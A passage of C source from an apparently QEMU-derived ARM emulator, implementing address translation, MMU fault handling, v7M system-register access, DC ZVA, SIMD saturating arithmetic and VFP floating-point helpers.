1 << ((base >> 1) & 0x1f); + /* Keep this shift separate from the above to avoid an + (undefined) << 32. 
*/ + mask = (mask << 1) - 1; + if (((base ^ address) & ~mask) == 0) + break; + } + if (n < 0) + return 2; + + if (access_type == 2) { + mask = env->cp15.pmsav5_insn_ap; + } else { + mask = env->cp15.pmsav5_data_ap; + } + mask = (mask >> (n * 4)) & 0xf; + switch (mask) { + case 0: + return 1; + case 1: + if (is_user) + return 1; + *prot = PAGE_READ | PAGE_WRITE; + break; + case 2: + *prot = PAGE_READ; + if (!is_user) + *prot |= PAGE_WRITE; + break; + case 3: + *prot = PAGE_READ | PAGE_WRITE; + break; + case 5: + if (is_user) + return 1; + *prot = PAGE_READ; + break; + case 6: + *prot = PAGE_READ; + break; + default: + /* Bad permission. */ + return 1; + } + *prot |= PAGE_EXEC; + return 0; +} + +/* get_phys_addr - get the physical address for this virtual address + * + * Find the physical address corresponding to the given virtual address, + * by doing a translation table walk on MMU based systems or using the + * MPU state on MPU based systems. + * + * Returns 0 if the translation was successful. Otherwise, phys_ptr, + * prot and page_size are not filled in, and the return value provides + * information on why the translation aborted, in the format of a + * DFSR/IFSR fault register, with the following caveats: + * * we honour the short vs long DFSR format differences. + * * the WnR bit is never set (the caller must do this). + * * for MPU based systems we don't bother to return a full FSR format + * value. 
 *
 * @env: CPUARMState
 * @address: virtual address to get physical address for
 * @access_type: 0 for read, 1 for write, 2 for execute
 * @is_user: 0 for privileged access, 1 for user
 * @phys_ptr: set to the physical address corresponding to the virtual address
 * @prot: set to the permissions for the page containing phys_ptr
 * @page_size: set to the size of the page containing phys_ptr
 */
static inline int get_phys_addr(CPUARMState *env, target_ulong address,
                                int access_type, int is_user,
                                hwaddr *phys_ptr, int *prot,
                                target_ulong *page_size)
{
    /* Fast Context Switch Extension: low addresses are relocated by FCSEIDR. */
    if (address < 0x02000000)
        address += env->cp15.c13_fcse;

    if ((env->cp15.c1_sys & SCTLR_M) == 0) {
        /* MMU/MPU disabled: flat mapping, full access. */
        *phys_ptr = address;
        *prot = PAGE_READ | PAGE_WRITE | PAGE_EXEC;
        *page_size = TARGET_PAGE_SIZE;
        return 0;
    } else if (arm_feature(env, ARM_FEATURE_MPU)) {
        *page_size = TARGET_PAGE_SIZE;
        return get_phys_addr_mpu(env, address, access_type, is_user, phys_ptr,
                                 prot);
    } else if (extended_addresses_enabled(env)) {
        /* LPAE long-descriptor table walk. */
        return get_phys_addr_lpae(env, address, access_type, is_user, phys_ptr,
                                  prot, page_size);
    } else if (env->cp15.c1_sys & SCTLR_XP) {
        /* v6 short-descriptor format (SCTLR.XP set). */
        return get_phys_addr_v6(env, address, access_type, is_user, phys_ptr,
                                prot, page_size);
    } else {
        /* Legacy v5 format with subpage AP bits. */
        return get_phys_addr_v5(env, address, access_type, is_user, phys_ptr,
                                prot, page_size);
    }
}

/* Handle a TLB miss: translate the address and either install a TLB entry
 * (returning 0) or record the fault syndrome/FSR in the exception state
 * and return nonzero so the caller raises the abort.
 */
int arm_cpu_handle_mmu_fault(CPUState *cs, vaddr address,
                             int access_type, int mmu_idx)
{
    CPUARMState *env = cs->env_ptr;
    hwaddr phys_addr;
    target_ulong page_size;
    int prot;
    int ret, is_user;
    uint32_t syn;
    bool same_el = (arm_current_el(env) != 0);

    is_user = mmu_idx == MMU_USER_IDX;
    ret = get_phys_addr(env, address, access_type, is_user, &phys_addr, &prot,
                        &page_size);
    if (ret == 0) {
        /* Map a single [sub]page.  */
        phys_addr &= TARGET_PAGE_MASK;
        address &= TARGET_PAGE_MASK;
        tlb_set_page(cs, address, phys_addr, prot, mmu_idx, page_size);
        return 0;
    }

    /* AArch64 syndrome does not have an LPAE bit */
    syn = ret & ~(1 << 9);

    /* For insn and data aborts we assume there is no instruction syndrome
     * information; this is always true for exceptions reported to EL1.
     */
    if (access_type == 2) {
        syn = syn_insn_abort(same_el, 0, 0, syn);
        cs->exception_index = EXCP_PREFETCH_ABORT;
    } else {
        syn = syn_data_abort(same_el, 0, 0, 0, access_type == 1, syn);
        if (access_type == 1 && arm_feature(env, ARM_FEATURE_V6)) {
            /* WnR bit of the DFSR (set for writes on v6+). */
            ret |= (1 << 11);
        }
        cs->exception_index = EXCP_DATA_ABORT;
    }

    env->exception.syndrome = syn;
    env->exception.vaddress = address;
    env->exception.fsr = ret;
    return 1;
}

/* Debug (gdbstub) translation: privileged read walk, -1 on failure. */
hwaddr arm_cpu_get_phys_page_debug(CPUState *cs, vaddr addr)
{
    ARMCPU *cpu = ARM_CPU(NULL, cs);
    hwaddr phys_addr;
    target_ulong page_size;
    int prot;
    int ret;

    ret = get_phys_addr(&cpu->env, addr, 0, 0, &phys_addr, &prot, &page_size);

    if (ret != 0) {
        return -1;
    }

    return phys_addr;
}

/* Write SP for an arbitrary CPU mode (current mode hits regs[13] directly). */
void HELPER(set_r13_banked)(CPUARMState *env, uint32_t mode, uint32_t val)
{
    if ((env->uncached_cpsr & CPSR_M) == mode) {
        env->regs[13] = val;
    } else {
        env->banked_r13[bank_number(mode)] = val;
    }
}

/* Read SP for an arbitrary CPU mode. */
uint32_t HELPER(get_r13_banked)(CPUARMState *env, uint32_t mode)
{
    if ((env->uncached_cpsr & CPSR_M) == mode) {
        return env->regs[13];
    } else {
        return env->banked_r13[bank_number(mode)];
    }
}

/* v7M MRS: read a special-purpose register selected by SYSm encoding. */
uint32_t HELPER(v7m_mrs)(CPUARMState *env, uint32_t reg)
{
    ARMCPU *cpu = arm_env_get_cpu(env);

    switch (reg) {
    case 0: /* APSR */
        return xpsr_read(env) & 0xf8000000;
    case 1: /* IAPSR */
        return xpsr_read(env) & 0xf80001ff;
    case 2: /* EAPSR */
        return xpsr_read(env) & 0xff00fc00;
    case 3: /* xPSR */
        return xpsr_read(env) & 0xff00fdff;
    case 5: /* IPSR */
        return xpsr_read(env) & 0x000001ff;
    case 6: /* EPSR */
        return xpsr_read(env) & 0x0700fc00;
    case 7: /* IEPSR */
        return xpsr_read(env) & 0x0700edff;
    case 8: /* MSP */
        /* current_sp selects which of regs[13]/other_sp holds MSP vs PSP. */
        return env->v7m.current_sp ? env->v7m.other_sp : env->regs[13];
    case 9: /* PSP */
        return env->v7m.current_sp ? env->regs[13] : env->v7m.other_sp;
    case 16: /* PRIMASK */
        return (env->daif & PSTATE_I) != 0;
    case 17: /* BASEPRI */
    case 18: /* BASEPRI_MAX */
        return env->v7m.basepri;
    case 19: /* FAULTMASK */
        return (env->daif & PSTATE_F) != 0;
    case 20: /* CONTROL */
        return env->v7m.control;
    default:
        /* ??? For debugging only.  */
        cpu_abort(CPU(cpu), "Unimplemented system register read (%d)\n", reg);
        return 0;
    }
}

/* v7M MSR: write a special-purpose register selected by SYSm encoding. */
void HELPER(v7m_msr)(CPUARMState *env, uint32_t reg, uint32_t val)
{
    ARMCPU *cpu = arm_env_get_cpu(env);

    switch (reg) {
    case 0: /* APSR */
        xpsr_write(env, val, 0xf8000000);
        break;
    case 1: /* IAPSR */
        xpsr_write(env, val, 0xf8000000);
        break;
    case 2: /* EAPSR */
        xpsr_write(env, val, 0xfe00fc00);
        break;
    case 3: /* xPSR */
        xpsr_write(env, val, 0xfe00fc00);
        break;
    case 5: /* IPSR */
        /* IPSR bits are readonly.  */
        break;
    case 6: /* EPSR */
        xpsr_write(env, val, 0x0600fc00);
        break;
    case 7: /* IEPSR */
        xpsr_write(env, val, 0x0600fc00);
        break;
    case 8: /* MSP */
        if (env->v7m.current_sp)
            env->v7m.other_sp = val;
        else
            env->regs[13] = val;
        break;
    case 9: /* PSP */
        if (env->v7m.current_sp)
            env->regs[13] = val;
        else
            env->v7m.other_sp = val;
        break;
    case 16: /* PRIMASK */
        if (val & 1) {
            env->daif |= PSTATE_I;
        } else {
            env->daif &= ~PSTATE_I;
        }
        break;
    case 17: /* BASEPRI */
        env->v7m.basepri = val & 0xff;
        break;
    case 18: /* BASEPRI_MAX */
        /* Only lowers (tightens) the priority mask, never raises it. */
        val &= 0xff;
        if (val != 0 && (val < env->v7m.basepri || env->v7m.basepri == 0))
            env->v7m.basepri = val;
        break;
    case 19: /* FAULTMASK */
        if (val & 1) {
            env->daif |= PSTATE_F;
        } else {
            env->daif &= ~PSTATE_F;
        }
        break;
    case 20: /* CONTROL */
        env->v7m.control = val & 3;
        switch_v7m_sp(env, (val & 2) != 0);
        break;
    default:
        /* ??? For debugging only.  */
        cpu_abort(CPU(cpu), "Unimplemented system register write (%d)\n", reg);
        return;
    }
}

#endif

void HELPER(dc_zva)(CPUARMState *env, uint64_t vaddr_in)
{
    /* Implement DC ZVA, which zeroes a fixed-length block of memory.
     * Note that we do not implement the (architecturally mandated)
     * alignment fault for attempts to use this on Device memory
     * (which matches the usual QEMU behaviour of not implementing either
     * alignment faults or any memory attribute handling).
     */

    ARMCPU *cpu = arm_env_get_cpu(env);
    uint64_t blocklen = 4 << cpu->dcz_blocksize;
    uint64_t vaddr = vaddr_in & ~(blocklen - 1);

#ifndef CONFIG_USER_ONLY
    {
        /* Slightly awkwardly, QEMU's TARGET_PAGE_SIZE may be less than
         * the block size so we might have to do more than one TLB lookup.
         * We know that in fact for any v8 CPU the page size is at least 4K
         * and the block size must be 2K or less, but TARGET_PAGE_SIZE is only
         * 1K as an artefact of legacy v5 subpage support being present in the
         * same QEMU executable.
         */

        int maxidx = DIV_ROUND_UP(blocklen, TARGET_PAGE_SIZE);
        /* msvc doesnt allow non-constant array sizes, so we work out the
         * size it would be:
         *   TARGET_PAGE_SIZE is 1024, blocklen is 64
         *   maxidx = (blocklen+TARGET_PAGE_SIZE-1) / TARGET_PAGE_SIZE
         *          = (64+1024-1) / 1024 = 1
         * NOTE(review): this hard-codes assumptions about dcz_blocksize and
         * TARGET_PAGE_SIZE for the MSVC build — confirm for other configs.
         */
#ifdef _MSC_VER
        void *hostaddr[1];
#else
        void *hostaddr[maxidx];
#endif
        int try, i;

        /* Two passes: first with whatever is already in the TLB, then once
         * more after forcing the entries in via a probe store.
         */
        for (try = 0; try < 2; try++) {

            for (i = 0; i < maxidx; i++) {
                hostaddr[i] = tlb_vaddr_to_host(env,
                                                vaddr + TARGET_PAGE_SIZE * i,
                                                1, cpu_mmu_index(env));
                if (!hostaddr[i]) {
                    break;
                }
            }
            if (i == maxidx) {
                /* If it's all in the TLB it's fair game for just writing to;
                 * we know we don't need to update dirty status, etc.
                 */
                for (i = 0; i < maxidx - 1; i++) {
                    memset(hostaddr[i], 0, TARGET_PAGE_SIZE);
                }
                memset(hostaddr[i], 0, blocklen - (i * TARGET_PAGE_SIZE));
                return;
            }
            /* OK, try a store and see if we can populate the tlb. This
             * might cause an exception if the memory isn't writable,
             * in which case we will longjmp out of here. We must for
             * this purpose use the actual register value passed to us
             * so that we get the fault address right.
             */
            helper_ret_stb_mmu(env, vaddr_in, 0, cpu_mmu_index(env), GETRA());
            /* Now we can populate the other TLB entries, if any */
            for (i = 0; i < maxidx; i++) {
                uint64_t va = vaddr + TARGET_PAGE_SIZE * i;
                if (va != (vaddr_in & TARGET_PAGE_MASK)) {
                    helper_ret_stb_mmu(env, va, 0, cpu_mmu_index(env), GETRA());
                }
            }
        }

        /* Slow path (probably attempt to do this to an I/O device or
         * similar, or clearing of a block of code we have translations
         * cached for). Just do a series of byte writes as the architecture
         * demands. It's not worth trying to use a cpu_physical_memory_map(),
         * memset(), unmap() sequence here because:
         *  + we'd need to account for the blocksize being larger than a page
         *  + the direct-RAM access case is almost always going to be dealt
         *    with in the fastpath code above, so there's no speed benefit
         *  + we would have to deal with the map returning NULL because the
         *    bounce buffer was in use
         */
        for (i = 0; i < blocklen; i++) {
            helper_ret_stb_mmu(env, vaddr + i, 0, cpu_mmu_index(env), GETRA());
        }
    }
#else
    memset(g2h(vaddr), 0, blocklen);
#endif
}

/* Note that signed overflow is undefined in C.  The following routines are
   careful to use unsigned types where modulo arithmetic is required.
   Failure to do so _will_ break on newer gcc.  */

/* Signed saturating arithmetic.  */

/* Perform 16-bit signed saturating addition.  */
static inline uint16_t add16_sat(uint16_t a, uint16_t b)
{
    uint16_t res;

    res = a + b;
    /* Overflow iff operands share a sign and the result's sign differs. */
    if (((res ^ a) & 0x8000) && !((a ^ b) & 0x8000)) {
        if (a & 0x8000)
            res = 0x8000;
        else
            res = 0x7fff;
    }
    return res;
}

/* Perform 8-bit signed saturating addition.  */
static inline uint8_t add8_sat(uint8_t a, uint8_t b)
{
    uint8_t res;

    res = a + b;
    if (((res ^ a) & 0x80) && !((a ^ b) & 0x80)) {
        if (a & 0x80)
            res = 0x80;
        else
            res = 0x7f;
    }
    return res;
}

/* Perform 16-bit signed saturating subtraction.  */
static inline uint16_t sub16_sat(uint16_t a, uint16_t b)
{
    uint16_t res;

    res = a - b;
    if (((res ^ a) & 0x8000) && ((a ^ b) & 0x8000)) {
        if (a & 0x8000)
            res = 0x8000;
        else
            res = 0x7fff;
    }
    return res;
}

/* Perform 8-bit signed saturating subtraction.
*/ +static inline uint8_t sub8_sat(uint8_t a, uint8_t b) +{ + uint8_t res; + + res = a - b; + if (((res ^ a) & 0x80) && ((a ^ b) & 0x80)) { + if (a & 0x80) + res = 0x80; + else + res = 0x7f; + } + return res; +} + +#define ADD16(a, b, n) RESULT(add16_sat(a, b), n, 16); +#define SUB16(a, b, n) RESULT(sub16_sat(a, b), n, 16); +#define ADD8(a, b, n) RESULT(add8_sat(a, b), n, 8); +#define SUB8(a, b, n) RESULT(sub8_sat(a, b), n, 8); +#define PFX q + +#include "op_addsub.h" + +/* Unsigned saturating arithmetic. */ +static inline uint16_t add16_usat(uint16_t a, uint16_t b) +{ + uint16_t res; + res = a + b; + if (res < a) + res = 0xffff; + return res; +} + +static inline uint16_t sub16_usat(uint16_t a, uint16_t b) +{ + if (a > b) + return a - b; + else + return 0; +} + +static inline uint8_t add8_usat(uint8_t a, uint8_t b) +{ + uint8_t res; + res = a + b; + if (res < a) + res = 0xff; + return res; +} + +static inline uint8_t sub8_usat(uint8_t a, uint8_t b) +{ + if (a > b) + return a - b; + else + return 0; +} + +#define ADD16(a, b, n) RESULT(add16_usat(a, b), n, 16); +#define SUB16(a, b, n) RESULT(sub16_usat(a, b), n, 16); +#define ADD8(a, b, n) RESULT(add8_usat(a, b), n, 8); +#define SUB8(a, b, n) RESULT(sub8_usat(a, b), n, 8); +#define PFX uq + +#include "op_addsub.h" + +/* Signed modulo arithmetic. */ +#define SARITH16(a, b, n, op) do { \ + int32_t sum; \ + sum = (int32_t)(int16_t)(a) op (int32_t)(int16_t)(b); \ + RESULT(sum, n, 16); \ + if (sum >= 0) \ + ge |= 3 << (n * 2); \ + } while(0) + +#define SARITH8(a, b, n, op) do { \ + int32_t sum; \ + sum = (int32_t)(int8_t)(a) op (int32_t)(int8_t)(b); \ + RESULT(sum, n, 8); \ + if (sum >= 0) \ + ge |= 1 << n; \ + } while(0) + + +#define ADD16(a, b, n) SARITH16(a, b, n, +) +#define SUB16(a, b, n) SARITH16(a, b, n, -) +#define ADD8(a, b, n) SARITH8(a, b, n, +) +#define SUB8(a, b, n) SARITH8(a, b, n, -) +#define PFX s +#define ARITH_GE + +#include "op_addsub.h" + +/* Unsigned modulo arithmetic. 
 */
/* Per-lane result stored via RESULT(); the GE flags record carry-out (add)
 * or not-borrow (subtract) for each lane, as the SEL instruction requires.
 */
#define ADD16(a, b, n) do { \
    uint32_t sum; \
    sum = (uint32_t)(uint16_t)(a) + (uint32_t)(uint16_t)(b); \
    RESULT(sum, n, 16); \
    if ((sum >> 16) == 1) \
        ge |= 3 << (n * 2); \
    } while(0)

#define ADD8(a, b, n) do { \
    uint32_t sum; \
    sum = (uint32_t)(uint8_t)(a) + (uint32_t)(uint8_t)(b); \
    RESULT(sum, n, 8); \
    if ((sum >> 8) == 1) \
        ge |= 1 << n; \
    } while(0)

#define SUB16(a, b, n) do { \
    uint32_t sum; \
    sum = (uint32_t)(uint16_t)(a) - (uint32_t)(uint16_t)(b); \
    RESULT(sum, n, 16); \
    if ((sum >> 16) == 0) \
        ge |= 3 << (n * 2); \
    } while(0)

#define SUB8(a, b, n) do { \
    uint32_t sum; \
    sum = (uint32_t)(uint8_t)(a) - (uint32_t)(uint8_t)(b); \
    RESULT(sum, n, 8); \
    if ((sum >> 8) == 0) \
        ge |= 1 << n; \
    } while(0)

#define PFX u
#define ARITH_GE

#include "op_addsub.h"

/* Halved signed arithmetic: result is (a op b) >> 1, computed at 32 bits
 * so the intermediate cannot overflow.
 */
#define ADD16(a, b, n) \
    RESULT(((int32_t)(int16_t)(a) + (int32_t)(int16_t)(b)) >> 1, n, 16)
#define SUB16(a, b, n) \
    RESULT(((int32_t)(int16_t)(a) - (int32_t)(int16_t)(b)) >> 1, n, 16)
#define ADD8(a, b, n) \
    RESULT(((int32_t)(int8_t)(a) + (int32_t)(int8_t)(b)) >> 1, n, 8)
#define SUB8(a, b, n) \
    RESULT(((int32_t)(int8_t)(a) - (int32_t)(int8_t)(b)) >> 1, n, 8)
#define PFX sh

#include "op_addsub.h"

/* Halved unsigned arithmetic.  */
#define ADD16(a, b, n) \
    RESULT(((uint32_t)(uint16_t)(a) + (uint32_t)(uint16_t)(b)) >> 1, n, 16)
#define SUB16(a, b, n) \
    RESULT(((uint32_t)(uint16_t)(a) - (uint32_t)(uint16_t)(b)) >> 1, n, 16)
#define ADD8(a, b, n) \
    RESULT(((uint32_t)(uint8_t)(a) + (uint32_t)(uint8_t)(b)) >> 1, n, 8)
#define SUB8(a, b, n) \
    RESULT(((uint32_t)(uint8_t)(a) - (uint32_t)(uint8_t)(b)) >> 1, n, 8)
#define PFX uh

#include "op_addsub.h"

/* Absolute difference of two unsigned bytes. */
static inline uint8_t do_usad(uint8_t a, uint8_t b)
{
    if (a > b)
        return a - b;
    else
        return b - a;
}

/* Unsigned sum of absolute byte differences.
 */
uint32_t HELPER(usad8)(uint32_t a, uint32_t b)
{
    /* Sum of |a[i] - b[i]| over the four bytes of each operand (USAD8). */
    uint32_t sum;
    sum = do_usad(a, b);
    sum += do_usad(a >> 8, b >> 8);
    sum += do_usad(a >> 16, b >> 16);
    sum += do_usad(a >> 24, b >> 24);
    return sum;
}

/* For ARMv6 SEL instruction.  */
uint32_t HELPER(sel_flags)(uint32_t flags, uint32_t a, uint32_t b)
{
    /* flags holds the four GE bits; build a per-byte mask and select
     * bytes of a where GE is set, bytes of b otherwise.
     */
    uint32_t mask;

    mask = 0;
    if (flags & 1)
        mask |= 0xff;
    if (flags & 2)
        mask |= 0xff00;
    if (flags & 4)
        mask |= 0xff0000;
    if (flags & 8)
        mask |= 0xff000000;
    return (a & mask) | (b & ~mask);
}

/* VFP support.  We follow the convention used for VFP instructions:
   Single precision routines have a "s" suffix, double precision a
   "d" suffix.  */

/* Convert host exception flags to vfp form.  */
static inline int vfp_exceptbits_from_host(int host_bits)
{
    int target_bits = 0;

    if (host_bits & float_flag_invalid)
        target_bits |= 1;
    if (host_bits & float_flag_divbyzero)
        target_bits |= 2;
    if (host_bits & float_flag_overflow)
        target_bits |= 4;
    /* Both underflow and output-denormal map to the UFC bit. */
    if (host_bits & (float_flag_underflow | float_flag_output_denormal))
        target_bits |= 8;
    if (host_bits & float_flag_inexact)
        target_bits |= 0x10;
    if (host_bits & float_flag_input_denormal)
        target_bits |= 0x80;
    return target_bits;
}

/* Assemble the architectural FPSCR from the stored register plus the live
 * vector length/stride fields and the softfloat exception flags.
 */
uint32_t HELPER(vfp_get_fpscr)(CPUARMState *env)
{
    int i;
    uint32_t fpscr;

    fpscr = (env->vfp.xregs[ARM_VFP_FPSCR] & 0xffc8ffff)
            | (env->vfp.vec_len << 16)
            | (env->vfp.vec_stride << 20);
    i = get_float_exception_flags(&env->vfp.fp_status);
    i |= get_float_exception_flags(&env->vfp.standard_fp_status);
    fpscr |= vfp_exceptbits_from_host(i);
    return fpscr;
}

/* Non-helper entry point for use from other QEMU code. */
uint32_t vfp_get_fpscr(CPUARMState *env)
{
    return HELPER(vfp_get_fpscr)(env);
}

/* Convert vfp exception flags to target form.
 */
static inline int vfp_exceptbits_to_host(int target_bits)
{
    int host_bits = 0;

    if (target_bits & 1)
        host_bits |= float_flag_invalid;
    if (target_bits & 2)
        host_bits |= float_flag_divbyzero;
    if (target_bits & 4)
        host_bits |= float_flag_overflow;
    if (target_bits & 8)
        host_bits |= float_flag_underflow;
    if (target_bits & 0x10)
        host_bits |= float_flag_inexact;
    if (target_bits & 0x80)
        host_bits |= float_flag_input_denormal;
    return host_bits;
}

/* Write the architectural FPSCR, propagating rounding mode, flush-to-zero,
 * default-NaN and exception flag state into the softfloat status structs.
 */
void HELPER(vfp_set_fpscr)(CPUARMState *env, uint32_t val)
{
    int i;
    uint32_t changed;

    changed = env->vfp.xregs[ARM_VFP_FPSCR];
    env->vfp.xregs[ARM_VFP_FPSCR] = (val & 0xffc8ffff);
    env->vfp.vec_len = (val >> 16) & 7;
    env->vfp.vec_stride = (val >> 20) & 3;

    changed ^= val;
    /* Only update softfloat state for fields that actually changed. */
    if (changed & (3 << 22)) {
        i = (val >> 22) & 3;
        switch (i) {
        case FPROUNDING_TIEEVEN:
            i = float_round_nearest_even;
            break;
        case FPROUNDING_POSINF:
            i = float_round_up;
            break;
        case FPROUNDING_NEGINF:
            i = float_round_down;
            break;
        case FPROUNDING_ZERO:
            i = float_round_to_zero;
            break;
        }
        set_float_rounding_mode(i, &env->vfp.fp_status);
    }
    if (changed & (1 << 24)) {
        set_flush_to_zero((val & (1 << 24)) != 0, &env->vfp.fp_status);
        set_flush_inputs_to_zero((val & (1 << 24)) != 0, &env->vfp.fp_status);
    }
    if (changed & (1 << 25))
        set_default_nan_mode((val & (1 << 25)) != 0, &env->vfp.fp_status);

    i = vfp_exceptbits_to_host(val);
    set_float_exception_flags(i, &env->vfp.fp_status);
    /* The standard (NEON) status always starts with clear flags. */
    set_float_exception_flags(0, &env->vfp.standard_fp_status);
}

/* Non-helper entry point for use from other QEMU code. */
void vfp_set_fpscr(CPUARMState *env, uint32_t val)
{
    HELPER(vfp_set_fpscr)(env, val);
}

#define VFP_HELPER(name, p) HELPER(glue(glue(vfp_,name),p))

/* Generate single- and double-precision wrappers around a softfloat binop. */
#define VFP_BINOP(name) \
float32 VFP_HELPER(name, s)(float32 a, float32 b, void *fpstp) \
{ \
    float_status *fpst = fpstp; \
    return float32_ ## name(a, b, fpst); \
} \
float64 VFP_HELPER(name, d)(float64 a, float64 b, void *fpstp) \
{ \
    float_status *fpst = fpstp; \
    return float64_ ## name(a, b, fpst); \
}
VFP_BINOP(add)
VFP_BINOP(sub)
VFP_BINOP(mul)
VFP_BINOP(div)
VFP_BINOP(min)
VFP_BINOP(max)
VFP_BINOP(minnum)
VFP_BINOP(maxnum)
#undef VFP_BINOP

float32 VFP_HELPER(neg, s)(float32 a)
{
    return float32_chs(a);
}

float64 VFP_HELPER(neg, d)(float64 a)
{
    return float64_chs(a);
}

float32 VFP_HELPER(abs, s)(float32 a)
{
    return float32_abs(a);
}

float64 VFP_HELPER(abs, d)(float64 a)
{
    return float64_abs(a);
}

float32 VFP_HELPER(sqrt, s)(float32 a, CPUARMState *env)
{
    return float32_sqrt(a, &env->vfp.fp_status);
}

float64 VFP_HELPER(sqrt, d)(float64 a, CPUARMState *env)
{
    return float64_sqrt(a, &env->vfp.fp_status);
}

/* XXX: check quiet/signaling case */
/* VFP compare: encode the NZCV result into FPSCR[31:28].
 * cmp uses the quiet comparison, cmpe the signaling one.
 */
#define DO_VFP_cmp(p, type) \
void VFP_HELPER(cmp, p)(type a, type b, CPUARMState *env)  \
{ \
    uint32_t flags; \
    switch(type ## _compare_quiet(a, b, &env->vfp.fp_status)) { \
    case 0: flags = 0x6; break; \
    case -1: flags = 0x8; break; \
    case 1: flags = 0x2; break; \
    default: case 2: flags = 0x3; break; \
    } \
    env->vfp.xregs[ARM_VFP_FPSCR] = (flags << 28) \
        | (env->vfp.xregs[ARM_VFP_FPSCR] & 0x0fffffff); \
} \
void VFP_HELPER(cmpe, p)(type a, type b, CPUARMState *env) \
{ \
    uint32_t flags; \
    switch(type ## _compare(a, b, &env->vfp.fp_status)) { \
    case 0: flags = 0x6; break; \
    case -1: flags = 0x8; break; \
    case 1: flags = 0x2; break; \
    default: case 2: flags = 0x3; break; \
    } \
    env->vfp.xregs[ARM_VFP_FPSCR] = (flags << 28) \
        | (env->vfp.xregs[ARM_VFP_FPSCR] & 0x0fffffff); \
}
DO_VFP_cmp(s, float32)
DO_VFP_cmp(d, float64)
#undef DO_VFP_cmp

/* Integer to float and float to integer conversions */

#define CONV_ITOF(name, fsz, sign) \
    float##fsz HELPER(name)(uint32_t x, void *fpstp) \
{ \
    float_status *fpst = fpstp; \
    return sign##int32_to_##float##fsz((sign##int32_t)x, fpst); \
}

/* NaN inputs convert to 0 with Invalid raised, per the ARM ARM. */
#define CONV_FTOI(name, fsz, sign, round) \
uint32_t HELPER(name)(float##fsz x, void *fpstp) \
{ \
    float_status *fpst = fpstp; \
    if (float##fsz##_is_any_nan(x)) { \
        float_raise(float_flag_invalid, fpst); \
        return 0; \
    } \
    return float##fsz##_to_##sign##int32##round(x, fpst); \
}

#define FLOAT_CONVS(name, p, fsz, sign) \
CONV_ITOF(vfp_##name##to##p, fsz, sign) \
CONV_FTOI(vfp_to##name##p, fsz, sign, ) \
CONV_FTOI(vfp_to##name##z##p, fsz, sign, _round_to_zero)

FLOAT_CONVS(si, s, 32, )
FLOAT_CONVS(si, d, 64, )
FLOAT_CONVS(ui, s, 32, u)
FLOAT_CONVS(ui, d, 64, u)

#undef CONV_ITOF
#undef CONV_FTOI
#undef FLOAT_CONVS

/* floating point conversion */
float64 VFP_HELPER(fcvtd, s)(float32 x, CPUARMState *env)
{
    float64 r = float32_to_float64(x, &env->vfp.fp_status);
    /* ARM requires that S<->D conversion of any kind of NaN generates
     * a quiet NaN by forcing the most significant frac bit to 1.
     */
    return float64_maybe_silence_nan(r);
}

float32 VFP_HELPER(fcvts, d)(float64 x, CPUARMState *env)
{
    float32 r = float64_to_float32(x, &env->vfp.fp_status);
    /* ARM requires that S<->D conversion of any kind of NaN generates
     * a quiet NaN by forcing the most significant frac bit to 1.
     */
    return float32_maybe_silence_nan(r);
}

/* VFP3 fixed point conversion.  */
/* Fixed-to-float: convert the integer, then scale down by 2^shift. */
#define VFP_CONV_FIX_FLOAT(name, p, fsz, isz, itype) \
float##fsz HELPER(vfp_##name##to##p)(uint##isz##_t  x, uint32_t shift, \
                                     void *fpstp) \
{ \
    float_status *fpst = fpstp; \
    float##fsz tmp; \
    tmp = itype##_to_##float##fsz(x, fpst); \
    return float##fsz##_scalbn(tmp, -(int)shift, fpst); \
}

/* Notice that we want only input-denormal exception flags from the
 * scalbn operation: the other possible flags (overflow+inexact if
 * we overflow to infinity, output-denormal) aren't correct for the
 * complete scale-and-convert operation.
 */
/* Float-to-fixed: scale up by 2^shift, then convert to the integer type.
 * NaN inputs convert to 0 with Invalid raised; only the input-denormal
 * flag from the scalbn is kept (see comment above).
 */
#define VFP_CONV_FLOAT_FIX_ROUND(name, p, fsz, isz, itype, round) \
uint##isz##_t HELPER(vfp_to##name##p##round)(float##fsz x, \
                                             uint32_t shift, \
                                             void *fpstp) \
{ \
    float_status *fpst = fpstp; \
    int old_exc_flags = get_float_exception_flags(fpst); \
    float##fsz tmp; \
    if (float##fsz##_is_any_nan(x)) { \
        float_raise(float_flag_invalid, fpst); \
        return 0; \
    } \
    tmp = float##fsz##_scalbn(x, shift, fpst); \
    old_exc_flags |= get_float_exception_flags(fpst) \
        & float_flag_input_denormal; \
    set_float_exception_flags(old_exc_flags, fpst); \
    return float##fsz##_to_##itype##round(tmp, fpst); \
}

/* AArch32 gets both round-to-zero and FPSCR-rounded variants... */
#define VFP_CONV_FIX(name, p, fsz, isz, itype) \
VFP_CONV_FIX_FLOAT(name, p, fsz, isz, itype) \
VFP_CONV_FLOAT_FIX_ROUND(name, p, fsz, isz, itype, _round_to_zero) \
VFP_CONV_FLOAT_FIX_ROUND(name, p, fsz, isz, itype, )

/* ...while the A64-only 64-bit forms need only the FPCR-rounded one. */
#define VFP_CONV_FIX_A64(name, p, fsz, isz, itype) \
VFP_CONV_FIX_FLOAT(name, p, fsz, isz, itype) \
VFP_CONV_FLOAT_FIX_ROUND(name, p, fsz, isz, itype, )

VFP_CONV_FIX(sh, d, 64, 64, int16)
VFP_CONV_FIX(sl, d, 64, 64, int32)
VFP_CONV_FIX_A64(sq, d, 64, 64, int64)
VFP_CONV_FIX(uh, d, 64, 64, uint16)
VFP_CONV_FIX(ul, d, 64, 64, uint32)
VFP_CONV_FIX_A64(uq, d, 64, 64, uint64)
VFP_CONV_FIX(sh, s, 32, 32, int16)
VFP_CONV_FIX(sl, s, 32, 32, int32)
VFP_CONV_FIX_A64(sq, s, 32, 64, int64)
VFP_CONV_FIX(uh, s, 32, 32, uint16)
VFP_CONV_FIX(ul, s, 32, 32, uint32)
VFP_CONV_FIX_A64(uq, s, 32, 64, uint64)
#undef VFP_CONV_FIX
#undef VFP_CONV_FIX_FLOAT
#undef VFP_CONV_FLOAT_FIX_ROUND

/* Set the current fp rounding mode and return the old one.
 * The argument is a softfloat float_round_ value.
 */
uint32_t HELPER(set_rmode)(uint32_t rmode, CPUARMState *env)
{
    float_status *fp_status = &env->vfp.fp_status;

    uint32_t prev_rmode = get_float_rounding_mode(fp_status);
    set_float_rounding_mode(rmode, fp_status);

    return prev_rmode;
}

/* Set the current fp rounding mode in the standard fp status and return
 * the old one. This is for NEON instructions that need to change the
 * rounding mode but wish to use the standard FPSCR values for everything
 * else. Always set the rounding mode back to the correct value after
 * modifying it.
 * The argument is a softfloat float_round_ value.
 */
uint32_t HELPER(set_neon_rmode)(uint32_t rmode, CPUARMState *env)
